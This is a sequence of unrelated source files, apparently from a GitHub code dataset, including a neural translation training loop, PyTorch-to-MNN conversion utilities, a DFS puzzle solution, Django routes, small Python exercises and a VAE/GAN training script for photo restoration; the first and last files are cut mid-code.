totalLen = len(inputData)\n random.shuffle(traindata)\n\n ### Update model on train\n train_loss = 0.\n train_target_words = 0\n for i, (input_words, target_words) in enumerate(progress(traindata)):\n # skip if empty\n if len(input_words) == 0 or len(target_words) == 0:\n continue\n loss = -m.logprob(input_words, target_words)\n opt.zero_grad()\n loss.backward()\n opt.step()\n train_loss += loss.item()\n train_target_words += len(target_words) # includes EOS\n if i % 100 == 0 and i != 0:\n avgTime = (time.time() - epochstartTime)/i\n timeLeftEpoch = avgTime * (totalLen-i)\n print(f' On line {i}/{totalLen}. 
Time left for epoch: {round(timeLeftEpoch/60, 3)} mins')\n\n print(f' train_loss={train_loss} train_ppl={math.exp(train_loss/train_target_words)}', flush=True)\n return m, opt\n\ndef validateDev(m, inputData, targetData):\n ### Validate on dev set and print out a few translations\n devdata = list(zip(inputData, targetData))\n dev_loss = 0.\n dev_ewords = 0\n for line_num, (fwords, twords) in enumerate(devdata):\n # skip if empty\n if len(fwords) == 0 or len(twords) == 0:\n continue\n dev_loss -= m.logprob(fwords, twords).item()\n dev_ewords += len(twords) # includes EOS\n if line_num < 10:\n translation = m.translate(fwords)\n print(' '.join(translation))\n\n print(f' dev_ppl={math.exp(dev_loss/dev_ewords)}', flush=True)\n print(f'Input words: {fwords} --> Output words: {translation}')\n return dev_loss\n\ndef outputPred(m, inputData):\n outputPred = []\n for words in inputData:\n try: \n translation = m.translate(words)\n except TypeError:\n print(f'Bad words: {words}')\n translation = []\n translation.append('')\n outputPred.append(translation)\n return outputPred\n\n\ndef outputTest(m, fileName, inputData, predType, dev_loss):\n '''\n Writes outputs to file\n predType is the type contained in the file, either target or foreign\n '''\n fileN = f'{fileName}-{predType}-{round(dev_loss, 3)}'\n with open(fileN, 'w') as outfile:\n for fwords in inputData:\n translation = m.translate(fwords)\n initialSent = ' '.join(fwords)\n translatedSent = ' '.join(translation)\n print(f'{initialSent} {translatedSent}', file=outfile)\n\n return\n\nif __name__ == \"__main__\":\n import argparse, sys\n \n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--dataf', dest='dataf', type=str, help='foreign language data')\n parser.add_argument('-t', '--datat', dest='datat', type=str, help='target language data')\n parser.add_argument('--initial', dest='initial', type=str, help='Initial rough translation of target language from foreign language data')\n parser.add_argument('--percentTrain', type=str, help='Percent to be used for training data (in decimal form), the remaining will be split between dev and test')\n parser.add_argument('--epochs', '-e', dest='epochs', type=int, help='Number of epochs to train per model per iteration')\n parser.add_argument('--iterations', '-i', dest='iterations', type=int, help='Number of iterations to go through')\n parser.add_argument('-o', '--outfile', dest='outfile', type=str, help='write translations to file')\n parser.add_argument('--load', type=str, help='load model from file')\n parser.add_argument('--savetf', dest='savetf', type=str, help='save target to foreign model in file')\n parser.add_argument('--saveft', dest='saveft', type=str, help='save foreign to target model in file')\n args = parser.parse_args()\n\n if args.dataf and args.initial and args.datat:\n '''\n dataf: Foreign Language data\n datat: Target language data\n initialTranslation: The rough initial translation of the foreign language into the target\n '''\n\n # Read in data\n dataf = read_mono(args.dataf)\n datat = read_mono(args.datat)\n initialTranslation = read_mono(args.initial)\n\n # trim sets\n maxLen = min([len(dataf), len(datat), len(initialTranslation)])\n dataf = dataf[:maxLen]\n datat = datat[:maxLen]\n initialTranslation = initialTranslation[:maxLen]\n\n # temporary\n # num = 500\n # dataf = dataf[:num]\n # datat = datat[:num]\n # initialTranslation = initialTranslation[:num]\n\n # Create vocabularies\n fvocab = Vocab()\n tvocab = Vocab()\n for fwords in dataf:\n fvocab |= fwords\n for 
twords in datat:\n tvocab |= twords\n\n # Create initial translation models\n # Do we need to update vocabs?\n target_to_foreign = Model(tvocab, 64, fvocab)\n foreign_to_target = Model(fvocab, 64, tvocab) # try increasing 64 to 128 or 256\n\n else:\n print('error: foreign data, target data, and rough initial translation all required', file=sys.stderr)\n sys.exit()\n\n if args.initial and not args.outfile:\n print('error: -o is required', file=sys.stderr)\n sys.exit()\n\n # start training\n if args.dataf and args.initial and args.datat:\n\n print(\"Starting to train\")\n # set variables\n numIterations = 5 if not args.iterations else int(args.iterations)\n numEpochs = 3 if not args.epochs else int(args.epochs)\n\n # declare optimizers\n opt_tf = torch.optim.Adam(target_to_foreign.parameters(), lr=0.0003)\n opt_ft = torch.optim.Adam(foreign_to_target.parameters(), lr=0.0003)\n\n # initialize data\n targetPred = initialTranslation\n percentTrain = 0.9 if not args.percentTrain else float(args.percentTrain)\n\n best_dev_loss1 = None\n best_dev_loss2 = None\n\n for iteration in range(numIterations):\n\n # train target to foreign\n print(f'Iteration {iteration+1}/{numIterations}, Target to Foreign:')\n # set data, need the lines in all the data to correspond\n predTargetTrain, predTargetTest, foreignTrain, foreignTest, targetTrain, targetTest = train_test_split(targetPred, dataf, datat, test_size=1-percentTrain)\n predTargetDev, predTargetTest, foreignDev, foreignTest, targetDev, targetTest = train_test_split(predTargetTest, foreignTest, targetTest, test_size=0.5)\n\n for epoch in range(numEpochs):\n epochstartTime = time.time()\n print(f' Epoch {epoch+1}/{numEpochs}:')\n # train model, should be pred training toward the actual foreign language\n target_to_foreign, opt_tf = trainModel(target_to_foreign, opt_tf, predTargetTrain, foreignTrain)\n\n # validate dev, should be the dif type of words, so target --> foreign\n dev_loss = validateDev(target_to_foreign, predTargetDev, foreignDev)\n if best_dev_loss1 is None or dev_loss < best_dev_loss1:\n best_model_tf = copy.deepcopy(target_to_foreign)\n if args.savetf:\n torch.save(target_to_foreign, args.savetf)\n\n ### Translate test set if good dev scoring\n if args.outfile:\n outputTest(target_to_foreign, args.outfile, predTargetTest, 'foreign', dev_loss)\n\n best_dev_loss1 = dev_loss\n # update model\n target_to_foreign = best_model_tf\n\n # train foreign to target\n print(f'Iteration {iteration+1}/{numIterations}, Foreign to Target:')\n # set data\n foreignPred = outputPred(target_to_foreign, targetPred)\n predForeignTrain, predForeignTest, foreignTrain, foreignTest, targetTrain, targetTest = train_test_split(foreignPred, dataf, datat, test_size=1-percentTrain)\n predForeignDev, predForeignTest, foreignDev, foreignTest, targetDev, targetTest = train_test_split(predForeignTest, foreignTest, targetTest, test_size=0.5)\n\n for epoch in range(numEpochs):\n print(f' Epoch {epoch+1}/{numEpochs}:')\n epochstartTime = time.time()\n # train model, should be pred training toward the actual target language\n foreign_to_target, opt_ft = trainModel(foreign_to_target, opt_ft, predForeignTrain, targetTrain)\n\n # validate dev, should be the dif type of words, so pred foreign --> actual target\n dev_loss = validateDev(foreign_to_target, predForeignDev, targetDev)\n if best_dev_loss2 is None or dev_loss < best_dev_loss2:\n best_model_ft = copy.deepcopy(foreign_to_target)\n if args.saveft:\n torch.save(foreign_to_target, args.saveft)\n\n ### Translate test set if good 
dev scoring\n if args.outfile:\n outputTest(foreign_to_target, args.outfile, predForeignTest, 'target', dev_loss)\n\n best_dev_loss2 = dev_loss\n # update model\n foreign_to_target = best_model_ft\n\n # update next iteration data\n targetPred = outputPred(foreign_to_target, foreignPred)\n\n print(f'Time left to complete: { (time.time() - totalstarttime) * (numIterations - 1 - iteration) }')\n","repo_name":"kekoawong/UnsupervisedLanguageTranslation","sub_path":"unsupervisedTranslation.py","file_name":"unsupervisedTranslation.py","file_ext":"py","file_size_in_byte":9976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"20013393818","text":"import json\nimport logging\nimport subprocess\nfrom pathlib import Path\n\nimport numpy as np\nimport torch\nfrom torch import Tensor\n\ncache_path = \"../../cloud/aggregation/cache/\"\nscript_path = \"../../../scripts/\"\n\n\ndef build_simple_linear(args):\n return torch.nn.Sequential([\n torch.nn.Flatten(),\n torch.nn.Linear(np.prod(args.input_shape), args.num_classes),\n torch.nn.Softmax(dim=1)\n ])\n\n\n_models = {\n 'linear': build_simple_linear,\n}\n\n\ndef get_mnn_model(name: str, args):\n if name not in _models:\n raise ValueError(f\"Unsupported model: {name}\")\n return _models[name](args)\n\n\ndef init_keymap(model_weights: dict) -> dict:\n \"\"\"\n Match keys from mnn to torch.\n\n MNN do not support mnn->torch conversion \n and do not keep keys inside state_dict when converted from torch model.\n\n MNN can be converted to JSON, which has a list of operations.\n Some operations have trainable parameters.\n All operations have a type.\n\n We currently support getting the key map of \n two types of operations which have trainable operations:\n 1. Convolution: weight, bias.\n 2. 
BatchNorm: slopeData, meanData, varData, biasData.\n This method initialize keymap as \n idx: an unsigned integer representing the index of\n the operation inside oplist which has trainable parameters.\n ->\n (\n key : a string representing the key of state_dict.\n type : a string representing the type of the operation in MNN.\n \"Convolution\"|\"BatchNorm\"\n shape : a tuple representing the original shape in torch.\n has_bias: a bool representing whether the operation has bias.\n ).\n Example: 4->(\"linear\", \"Convolution\", (10, 2352)), True)\n\n Args:\n model_weights (dict): PyTorch model weights in state_dict.\n\n Returns:\n dict: MNN oplist index -> PyTorch state_dict key map.\n \"\"\"\n # load converted JSON file to mnn_json\n subprocess.call([\n f\"{script_path}MNNDump2Json\",\n f\"{cache_path}model.mnn\",\n f\"{cache_path}model.json\"])\n with open('../../cloud/aggregation/cache/model.json') as f:\n mnn_json = json.load(f)\n keymap = {}\n torch_keys = set()\n for key in model_weights.keys():\n torch_keys.add('.'.join(key.split('.')[:-1]))\n for idx, op in enumerate(mnn_json[\"oplists\"]):\n if \"Convolution\" in op[\"type\"]:\n for key in torch_keys:\n if f'{key}.weight' in model_weights.keys():\n mnn_weight = torch.tensor(op['main']['weight'])\n torch_weight = model_weights[f'{key}.weight']\n torch_weight_flat = torch_weight.reshape(-1)\n if mnn_weight.shape == torch_weight_flat.shape and (\n mnn_weight - torch_weight_flat).max() < 1e-4:\n keymap[idx] = (\n key, \"Convolution\", tuple(torch_weight.shape),\n f'{key}.bias' in model_weights.keys())\n torch_keys.remove(key)\n break\n elif op[\"type\"] == \"BatchNorm\":\n for key in torch_keys:\n if f'{key}.weight' in model_weights.keys():\n mnn_weight = torch.tensor(op['main']['slopeData'])\n torch_weight = model_weights[f'{key}.weight']\n if mnn_weight.shape == torch_weight.shape and (\n mnn_weight - torch_weight).max() < 1e-4:\n keymap[idx] = (\n key, \"BatchNorm\", tuple(torch_weight.shape), True)\n torch_keys.remove(key)\n break\n return keymap\n\n\ndef torch_to_mnn(model, input_shape: Tensor):\n \"\"\"Convert torch model to mnn binary.\n\n Args:\n model (Module): Pytorch model to be converted.\n input_shape (Tensor): Shape of input to the model.\n\n Returns:\n JSON object: MNN model in JSON format.\n \"\"\"\n # PyTorch -> ONNX\n input_data = torch.randn(input_shape)\n input_names = [\"input\"]\n output_names = [\"output\"]\n Path(cache_path).mkdir(exist_ok=True)\n torch.onnx.export(\n model, input_data, f\"{cache_path}model.onnx\", verbose=True,\n training=torch.onnx.TrainingMode.TRAINING, do_constant_folding=False,\n input_names=input_names, output_names=output_names)\n\n # ONNX -> MNN\n subprocess.call([\n f\"{script_path}MNNConvert\", \"-f\", \"ONNX\", \"--modelFile\",\n f\"{cache_path}model.onnx\", \"--MNNModel\", f\"{cache_path}model.mnn\", \"--forTraining\"])\n\n return Path(f'{cache_path}model.mnn').read_bytes()\n\n\ndef mnn_to_torch(keymap: dict, mnn_model_binary: bytes, client_id: str):\n \"\"\"\n Extract trainable parameters from mnn json.\n Then convert it to state_dict, matching pytorch model.\n Args:\n keymap (dict): Key map from MNN oplist index to PyTorch state_dict key.\n data (JSON object): MNN model in JSON.\n Returns:\n dict: Returned the converted state_dict.\n \"\"\"\n Path(f'{cache_path}{client_id}.mnn').write_bytes(mnn_model_binary)\n subprocess.call([\n f\"{script_path}MNNDump2Json\",\n f\"{cache_path}{client_id}.mnn\",\n f\"{cache_path}{client_id}.json\"\n ])\n data = 
json.load(f\"{cache_path}{client_id}.json\")\n Path(f'{cache_path}{client_id}.mnn').unlink()\n Path(f'{cache_path}{client_id}.json').unlink()\n state_dict = {}\n for idx, val in keymap.items():\n key, mnn_type, shape, has_bias = val\n if mnn_type == 'Convolution':\n state_dict[f'{key}.weight'] = np.asarray(\n data['oplists'][idx]['main']['weight'],\n dtype=np.float32).reshape(shape)\n if has_bias:\n state_dict[f'{key}.bias'] = np.asarray(\n data['oplists'][idx]['main']['bias'],\n dtype=np.float32)\n elif mnn_type == 'BatchNorm':\n state_dict[f'{key}.weight'] = np.asarray(\n data['oplists'][idx]['main']['slopeData'],\n dtype=np.float32)\n state_dict[f'{key}.bias'] = np.asarray(\n data['oplists'][idx]['main']['biasData'],\n dtype=np.float32)\n state_dict[f'{key}.running_mean'] = np.asarray(\n data['oplists'][idx]['main']['meanData'],\n dtype=np.float32)\n state_dict[f'{key}.running_var'] = np.asarray(\n data['oplists'][idx]['main']['varData'],\n dtype=np.float32)\n else:\n logging.ERROR(f\"Unsupported MNN Type: {mnn_type}\")\n return state_dict\n","repo_name":"SymbioticLab/FedScale","sub_path":"fedscale/utils/models/mnn_model_provider.py","file_name":"mnn_model_provider.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":343,"dataset":"github-code","pt":"44"} +{"seq_id":"41438993646","text":"\"\"\"\n단위 정육각형 이루어져 있는 지도가 주어졌을 때, \n해변의 길이를 구하는 프로그램을 작성하시오.\n\n해변은 정육각형의 변 중에서 한 쪽은 물인데, 한 쪽은 땅인 곳을 의미한다.\n\n첫째 줄에 지도의 세로 크기 N과 가로 크기 M이 주어진다. (1 ≤ N, M ≤ 50)\n둘째 줄부터 N개의 줄에 지도가 주어진다. '.'은 물, '#'은 땅이다.\n\"\"\"\n\ndef dfs(x, y):\n global result \n if x >= N or x < 0 or y >= M or y < 0: # 범위 밖 확인\n return False\n\n if beach[x][y] == '.':\n beach[x][y] = 1 # 현재 노드 방문\n\n # 상, 하, 좌, 우 확인\n dfs(x+1, y)\n dfs(x-1, y)\n dfs(x, y-1)\n dfs(x, y+1)\n\n return True\n\n if beach[x][y] == '#':\n result += 1\n return False\n\nN, M = map(int, input().split())\nbeach = []\n\nfor _ in range(N):\n beach.append(list(input()))\n\nresult = 0\n\nfor i in range(N):\n for j in range(M):\n if dfs(i, j):\n result += 1\n\nprint(result)\n","repo_name":"honge7694/algorithm","sub_path":"baekjoon/14397_해변_X.py","file_name":"14397_해변_X.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39564034148","text":"\"\"\"\r\nThe Self-Taught Programmer - Chapter 8 Files\r\nAuthor: Dante Valentine\r\nDate: 4 June, 2021\r\n\"\"\"\r\n\r\n# CHALLENGE 1 (Print contents of a document already on computer)\r\nimport os\r\ndojotext = os.path.join(\"C:\\\\\",\"Users\", \"Toi\", \"Desktop\", \"Python\", \"dojo.txt\")\r\ndojotext2 = os.path.join(\"C:\\\\\",\"Users\", \"Toi\", \"Desktop\", \"Python\", \"dojo2.txt\")\r\n\r\ndojo = open(dojotext,\"r\")\r\nprint(dojo.read())\r\ndojo.close()\r\n\r\nwith open(dojotext2, \"r\") as f:\r\n print(f.read())\r\n\r\n# CHALLENGE 2 (write a program that asks user a question and saves answer to a file)\r\ndatadoc = \"datadoc.txt\"\r\nfname = input(\"What is your first name?\\n > \")\r\n\r\nwith open(datadoc, \"w\") as f:\r\n f.write(fname)\r\n\r\n# CHALLENGE 3 (Take items in the given list of lists and write to a csv with data from each list in its own row)\r\nimport csv\r\nlistcsv = \"listcsv.csv\"\r\n\r\ngivenlist = [[\"Top Gun\", \"Risky Business\", \"Minority Report\"],[\"Titanic\", \"The Revenant\", \"Inception\"],[\"Training Day\", \"Man on Fire\", \"Flight\"]]\r\nwith open(\"listcsv\", \"w\") as f:\r\n w = csv.writer(f, delimiter=\",\")\r\n 
w.writerow(givenlist[0])\r\n w.writerow(givenlist[1])\r\n w.writerow(givenlist[2])\r\n\r\n","repo_name":"spicydojoroll/tstp_challenges","sub_path":"TSTP_20210604_CH9_Files.py","file_name":"TSTP_20210604_CH9_Files.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21200020244","text":"from django.urls import path\nfrom app import views\n\nurlpatterns = [\n # auth\n path('', views.login, name = 'login'),\n path('register', views.register, name = 'register'),\n path('logout', views.logout, name = 'logout'),\n # home page\n path('mobify/', views.index, name = 'index'),\n # product, product detail, cart\n path('mobify/product//', views.product, name = 'product'),\n path('mobify/product//detail', views.productDetail, name = 'product_detail'),\n path('mobify/cart', views.cart, name = 'cart'),\n path('mobify/profile/', views.profile, name = 'profile'),\n # add cart, remove cart\n path('mobify/add-cart', views.addCart, name = 'add_cart'),\n path('mobify/remove-cart', views.removeCart, name = 'remove_cart'),\n path('mobify/remove-review', views.removeReivew, name = 'remove_review'),\n]\n","repo_name":"Rahgul007/mobify_ecom","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6696053949","text":"import time\nimport functools\n\n\ndef log_decorator(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n start_time = time.time()\n\n with open(\"logs/log.txt\", \"a\") as log_file:\n log_file.write(f\"Function {func.__name__} started at {time.ctime(start_time)}\\n\")\n\n res = func(*args, **kwargs)\n end_time = time.time()\n duration = end_time - start_time\n\n with open(\"logs/log.txt\", \"a\") as log_file:\n log_file.write(f\"Function {func.__name__} finished at {time.ctime(end_time)}\\n\")\n log_file.write(f\"Function {func.__name__} took {duration:.2f} seconds to execute.\\n\")\n return res\n\n return wrapper\n","repo_name":"MaxKosPy/Beetroot_telegram_bot","sub_path":"logs/save_logs.py","file_name":"save_logs.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28792335341","text":"import googlemaps\nfrom GolfConnect.settings import GOOGLE_MAP_API_KEY\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\n\n\n__author__ = 'toantran'\n\n\ndef get_client_ip(request):\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n return ip\n\n\ndef paginate_query(query, page, item):\n paginator = Paginator(query, item)\n try:\n paginate = paginator.page(page)\n except PageNotAnInteger:\n paginate = paginator.page(1)\n except EmptyPage:\n paginate = paginator.page(paginator.num_pages)\n return paginate\n\n\ndef get_distance(origins, destionations):\n gmaps = googlemaps.Client(key=GOOGLE_MAP_API_KEY)\n return gmaps.distance_matrix(origins, destionations)","repo_name":"minhdo6487/api-proto","sub_path":"utils/rest/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40932622842","text":"import json\nimport difflib\n#from difflib import SequenceMatcher\nfrom difflib import get_close_matches\n\ndata = 
json.load(open(\"data.json\"))\n\ndef translate(word):\n word = word.lower()\n if word in data:\n return data[word]\n elif word.title() in data:\n return data[word.title()]\n elif word.upper() in data:\n return data[word.upper()]\n #elif (SequenceMatcher(None,word,\"rain\").ratio() > 0.8):\n # return data[\"rain\"]\n elif ( len(get_close_matches(word,data.keys())) > 0 ):\n word1 = get_close_matches(word,data.keys())[0]\n x = input(\"Did you mean %s instead? Enter Y is yes, or N if no: \" % word1)\n x = x.upper()\n if x == \"Y\":\n return data[word1]\n elif x==\"N\":\n return \"Thw word doesn't exist....Please double check it.\"\n else:\n return \"We dint understand your entry.\"\n else:\n return \"Thw word doesn't exist....Please double check it.\"\n\n\nword = input(\"Enter the word: \")\n\noutput = translate(word) \n\nif type(output) == list:\n for item in output:\n print(item)\nelse:\n print(output)","repo_name":"balajibhaskar11/English-Thesaurus","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1346254667","text":"import torch\nimport torch.nn.functional as F\nfrom Global import models\n\nfrom Global.models import networks\nfrom Global.models import mapping_model\nimport itertools\nimport torchvision\n\nimport os\nfrom torch.utils.data import Dataset, DataLoader\nfrom PIL import Image as IMG\nfrom torchvision import transforms as tmf\nfrom Global.options.test_options import TestOptions\n\n\nclass CelebDataset(Dataset):\n def __init__(self, **kw):\n self.images_dir = kw.get('images_dir')\n self.images = os.listdir(self.images_dir)\n self.images = self.images[:kw.get('lim', len(self.images))]\n self.image_size = kw.get('image_size', 64)\n\n def __getitem__(self, index):\n file = self.images[index]\n img = self.transforms(IMG.open(self.images_dir + os.sep + file))\n return {'input': img}\n \n def __len__(self):\n return len(self.images)\n\n @property\n def transforms(self):\n return tmf.Compose(\n [tmf.Resize(self.image_size), tmf.CenterCrop(self.image_size),\n tmf.ToTensor(), tmf.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n### lsgan: a=0, b=c=1\ndef lsgan_d(d_logit_real, d_logit_fake):\n return F.mse_loss(d_logit_real, torch.ones_like(d_logit_real)) + d_logit_fake.pow(2).mean()\n\ndef lsgan_g(d_logit_fake):\n return F.mse_loss(d_logit_fake, torch.ones_like(d_logit_fake))\n\n\ndef build_model(opt):\n \"\"\" stage 1.1 train 2 vae \"\"\"\n # TODO stage 1.2 train mapping network\n print(\"build 2 vae and a transfer network\")\n model = mapping_model.Pix2PixHDModel_Mapping()\n model.initialize(opt)\n\n ##### define networks\n print(\"build vae1 and vae2 ...\")\n vae1 = networks.GlobalGenerator_DCDCv2(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n opt.k_size,\n opt.n_downsample_global,\n networks.get_norm_layer(norm_type=opt.norm),\n opt=opt,\n )\n vae2 = networks.GlobalGenerator_DCDCv2(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n opt.k_size,\n opt.n_downsample_global,\n networks.get_norm_layer(norm_type=opt.norm),\n opt=opt,\n )\n vae1.apply(networks.weights_init)\n vae2.apply(networks.weights_init)\n print(\"build vae1 and vae2 finish!\")\n print(\"build D ...\")\n xr_recon_d = networks.Z_xr_Discriminator(input_nc=3, ndf=opt.disc_ch, n_layers=opt.disc_layers).to(opt.device)\n z_xr_d = networks.Z_xr_Discriminator(input_nc=opt.feat_dim, ndf=opt.disc_ch, n_layers=opt.disc_layers).to(opt.device)\n y_recon_d 
=networks.Z_xr_Discriminator(input_nc=3, ndf=opt.disc_ch, n_layers=opt.disc_layers).to(opt.device)\n print(\"build D finish\")\n \"\"\" Optim \"\"\"\n optimizer_vae1 = torch.optim.Adam(vae1.parameters(), lr=opt.lr, betas=(0.5, 0.999), weight_decay=0, eps=1e-6)\n optimizer_d1 = torch.optim.Adam(itertools.chain(xr_recon_d.parameters(), z_xr_d.parameters()),lr=opt.lr, betas=(0.5, 0.999), weight_decay=0, eps=1e-6)\n optimizer_vae2 = torch.optim.Adam(vae2.parameters(), lr=opt.lr, betas=(0.5, 0.999), weight_decay=0, eps=1e-6)\n optimizer_d2 = torch.optim.Adam(y_recon_d.parameters(), lr=opt.lr, betas=(0.5, 0.999), weight_decay=0, eps=1e-6)\n return vae1, xr_recon_d, z_xr_d, vae2, y_recon_d, optimizer_vae1, optimizer_d1, optimizer_vae2, optimizer_d2\n\n# build 2 vae network, 3 discriminators but NO transfer network for now\n# and their optimizer\n\n\ncelebdataset = CelebDataset(images_dir='/data/akhanal1/img_align_celeba', lim=100)\ndataloader = DataLoader(dataset=celebdataset, batch_size=4, pin_memory=True, num_workers=4)\n\nbatch = next(dataloader.__iter__())\nprint(batch['input'].shape)\n\nsys.exit()\nopt = TestOptions().parse(save=False)\nparameter_set(opt)\n\n\n# self.parser.add_argument(\"--batchSize\", type=int, default=1, help=\"input batch size\")\n# self.parser.add_argument(\"--loadSize\", type=int, default=1024, help=\"scale images to this size\")\n# self.parser.add_argument(\"--fineSize\", type=int, default=512, help=\"then crop to this size\")\n# self.parser.add_argument(\"--label_nc\", type=int, default=35, help=\"# of input label channels\")\n# self.parser.add_argument(\"--input_nc\", type=int, default=3, help=\"# of input image channels\")\n# self.parser.add_argument(\"--output_nc\", type=int, default=3, help=\"# of output image channels\")\nvae1 = networks.GlobalGenerator_DCDCv2(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n opt.k_size,\n opt.n_downsample_global,\n networks.get_norm_layer(norm_type=opt.norm),\n opt=opt,\n )\n\nvae1, xr_recon_d, z_xr_d, vae2, y_recon_d, optimizer_vae1, optimizer_d1, optimizer_vae2, optimizer_d2 = build_model(opt)\nstart_iter = 0\nif opt.load_checkpoint_iter>0:\n checkpoint_path = checkpoint_root + f'/global_checkpoint_{opt.load_checkpoint_iter}.pth'\n if not Path(checkpoint_path).exists():\n print(f\"ERROR! checkpoint_path {checkpoint_path} is None\")\n exit(-1)\n state_dict = torch.load(checkpoint_path)\n start_iter = state_dict['iter']\n assert state_dict['batch_size'] == opt.batch_size, f\"ERROR - batch size changed! 
load: {state_dict['batch_size']}, but now {opt.batch_size}\"\n vae1.load_state_dict(state_dict['vae1'])\n xr_recon_d.load_state_dict(state_dict['xr_recon_d'])\n z_xr_d.load_state_dict(state_dict['z_xr_d'])\n vae2.load_state_dict(state_dict['vae2'])\n y_recon_d.load_state_dict(state_dict['y_recon_d'])\n optimizer_vae1.load_state_dict(state_dict['optimizer_vae1'])\n optimizer_d1.load_state_dict(state_dict['optimizer_d1'])\n optimizer_vae2.load_state_dict(state_dict['optimizer_vae2']) \n optimizer_d2.load_state_dict(state_dict['optimizer_d2']) \n print(\"checkpoint load successfully!\")\n# create dataloader\ndataLoaderR, dataLoaderXY = get_dataloader(opt)\ndataLoaderXY_iter = iter(dataLoaderXY)\ndataLoaderR_iter = iter(dataLoaderR)\nstart = time.perf_counter()\nprint(\"train start!\")\nfor ii in range(opt.total_iter - start_iter):\n current_iter = ii + start_iter\n try:\n x, y, path_y = dataLoaderXY_iter.next()\n except:\n dataLoaderXY_iter = iter(dataLoaderXY)\n x, y, path_y = dataLoaderXY_iter.next()\n try:\n r, path_r = dataLoaderR_iter.next()\n except:\n dataLoaderR_iter = iter(dataLoaderR)\n r, path_r = dataLoaderR_iter.next()\n ### following the practice in U-GAT-IT:\n ### train D and G iteratively, but not training D multiple times than training G\n r = r.to(opt.device)\n x = x.to(opt.device)\n y = y.to(opt.device)\n if opt.debug and current_iter%500==0:\n torchvision.utils.save_image(y, 'train_vae_y.png', normalize=True)\n torchvision.utils.save_image(x, 'train_vae_x.png', normalize=True)\n torchvision.utils.save_image(r, 'train_vae_r.png', normalize=True)\n\n ### vae1 train d\n # save gpu memory since no need calc grad for net G when train net D\n with torch.no_grad():\n z_x, mean_x, var_x, recon_x = vae1(x)\n z_r, mean_r, var_r, recon_r = vae1(r)\n batch_requires_grad(z_x, mean_x, var_x, recon_x,z_r, mean_r, var_r, recon_r)\n loss_1 = 0\n adv_loss_d_x = lsgan_d(xr_recon_d(x), xr_recon_d(recon_x))\n adv_loss_d_r = lsgan_d(xr_recon_d(r), xr_recon_d(recon_r))\n # z_x is real and z_r is fake here because let z_r close to z_x\n adv_loss_d_xr = lsgan_d(z_xr_d(z_x), z_xr_d(z_r))\n loss_1_d = adv_loss_d_x + adv_loss_d_r + adv_loss_d_xr\n loss_1_d.backward()\n optimizer_d1.step()\n optimizer_d1.zero_grad()\n ### vae1 train g\n # since we need update weights of G, the result should be re-calculate with grad\n z_x, mean_x, var_x, recon_x = vae1(x)\n z_r, mean_r, var_r, recon_r = vae1(r)\n adv_loss_g_x = lsgan_g(xr_recon_d(recon_x))\n adv_loss_g_r = lsgan_g(xr_recon_d(recon_r))\n # z_x is real and z_r is fake here because let z_r close to z_x\n adv_loss_g_xr = lsgan_g(z_xr_d(z_r))\n KLDloss_1_x = -0.5 * torch.sum(1 + var_x - mean_x.pow(2) - var_x.exp()) # KLD\n L1loss_1_x = opt.weight_alpha * F.l1_loss(x, recon_x)\n KLDloss_1_r = -0.5 * torch.sum(1 + var_r - mean_r.pow(2) - var_r.exp()) # KLD\n L1loss_1_r = opt.weight_alpha * F.l1_loss(r, recon_r)\n loss_1_g = adv_loss_g_x + KLDloss_1_x + L1loss_1_x + adv_loss_g_r + KLDloss_1_r + L1loss_1_r + adv_loss_g_xr\n loss_1_g.backward()\n optimizer_vae1.step()\n optimizer_vae1.zero_grad()\n\n ### vae2 train d\n # save gpu memory since no need calc grad for net G when train net D\n with torch.no_grad():\n z_y, mean_y, var_y, recon_y = vae2(y)\n batch_requires_grad(z_y, mean_y, var_y, recon_y)\n adv_loss_d_y = lsgan_d(y_recon_d(y), y_recon_d(recon_y))\n loss_2_d = adv_loss_d_y\n loss_2_d.backward()\n optimizer_d2.step()\n optimizer_d2.zero_grad()\n ### vae2 train g\n # since we need update weights of G, the result should be re-calculate with grad\n z_y, 
